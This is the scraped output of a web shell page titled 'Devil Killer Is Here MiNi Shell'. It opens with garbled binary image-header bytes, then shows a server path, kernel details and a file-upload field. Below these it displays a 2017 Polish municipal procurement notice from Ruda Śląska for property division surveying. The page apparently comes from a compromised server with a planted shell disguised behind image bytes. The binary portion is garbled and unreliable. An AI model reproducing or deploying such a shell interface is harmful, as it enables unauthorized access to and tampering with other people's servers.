JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170427/74766-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.rudaslaska.bip.info.pl' target='_blank'>http://www.rudaslaska.bip.info.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 74766 - 2017
              z dnia 2017-04-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ruda Śląska: Wykonanie podziałów i projektów podziałów nieruchomości położonych w Rudzie Śląskiej oraz wznowienia i wskazania granic nieruchomości położonej w Rudzie Śląskiej.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Ruda Śląska, krajowy numer identyfikacyjny
              00051584000000, ul.
              Plac Jana Pawła II 
              6,
              41709  
              Ruda Śląska, woj.
              śląskie, państwo
              Polska, tel.
              032 2486281 do 9; 2449094, e-mail
              zamowienia@ruda-sl.pl, faks
              032 248 7348.
              <br />
              Adres strony internetowej (URL): www.rudaslaska.bip.info.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.rudaslaska.bip.info.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w siedzibie Zamawiającego tj. w Urzędzie Miasta Ruda Śląska  Wydziale Zamówień Publicznych w pokoju nr 401, a w przypadku przesłania oferty przesyłką pocztową dopuszcza się złożenie w Biurze Obsługi Mieszkańców na parterze budynku Urzędu Miasta<br />
                Adres:
                <br />Urząd Miasta Ruda Śląska, Wydział Zamówień Publicznych, Pl. Jana Pawł II 6, 41-709 Ruda Śląska</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie podziałów i projektów podziałów nieruchomości położonych w Rudzie Śląskiej oraz wznowienia i wskazania granic nieruchomości położonej w Rudzie Śląskiej.<br /><b>Numer referencyjny: </b>AP.271.44.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie podziałów i projektów podziałów nieruchomości położonych w Rudzie Śląskiej oraz wznowienia i wskazania granic nieruchomości położonej w Rudzie Śląskiej.
Zamówienie składa się z 12 części (zadań):
1) Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy 1 Maja  Zygmunta Krasińskiego (Postanowienie z dnia 15.02.2017 r. nr AM.6831.2.4.2017)
2) Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Ryszard Magdziorza i Jana Gwiżdża (Postanowienie z dnia 31.01.2017 r. nr AM.6831.2.2.2017)
3) Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Bielszowickiej (Postanowienie z dnia 12.01.2017 r. nr AM.6831.2.56.2016)
4) Podział nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Solnej (Postanowienie z dnia 09.01.2017 r. nr AM.6831.2.53.2016)
5) Podział nieruchomości położonej w Rudzie Śląskiej  Bielszowicach przy ulicy Edmunda Kokota (Postanowienie z dnia 13.03.2017 r. nr AM.6831.2.7.2017)
6) Podział nieruchomości położonej w Rudzie Śląskiej  Halembie przy Morskiej (Postanowienie z dnia 23.03.2017 r. nr AM.6831.2.9.2017)
7) Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej. 
8) Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Opolskiej. 
9) Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Gajowej. 
10) Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Bielszowicach przy ulicy Szkolnej i Mokrej. 
11) Wznowienie granicy nieruchomości i sporządzenie projektu podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej i Chmielnej. 
12) Wznowienie i wskazanie granic nieruchomości położonej w Rudzie Śląskiej - Ruda przy ulicy Wyleżoła dz. 1011/259.
<br /><br /><b>II.5) Główny kod CPV: </b>71353200-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 161<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia:
Zadania nr 1  6: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy
Zadanie nr 7  105 dni do dnia zawarcia umowy
Zadanie nr 8  98 dni od dnia zawarcia umowy
Zadania nr 9  10 - 112 dni do dnia zawarcia umowy
Zadanie nr 11  161 dni do dnia zawarcia umowy
Zadanie 12  91 dni od dnia zawarcia umowy</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej:
- dla zadań nr 1-11 - 2 podziały nieruchomości,
- dla zadań nr 12  1 podział nieruchomości lub 1 wznowienie.
W przypadku składania ofert na wszystkie zadania 1 - 12 wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie, co najmniej 3 podziały lub 2 podziały i 1 wznowienie.
2. Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) przynajmniej 1 osobą posiadającą uprawnienia zawodowe w zakresie: rozgraniczenia i podziałów nieruchomości (gruntów) oraz sporządzenia dokumentacji do celów prawnych zgodnie przepisami ustawy z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz.U. 2016, poz. 1629 z późn. zm.) lub której uprawnienia zostały uznane zgodnie z przepisami ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016, poz. 65), bądź na podstawie innych właściwych przepisów.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie.
Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich  uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
3. dokument (np. zobowiązanie) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy.
Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 24 ust. 1 pkt 23 ustawy, Wykonawca przekazuje, stosownie do treści art. 24 ust. 11 ustawy (w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art. 86 ust. 5 ustawy), oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz z przekazaniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
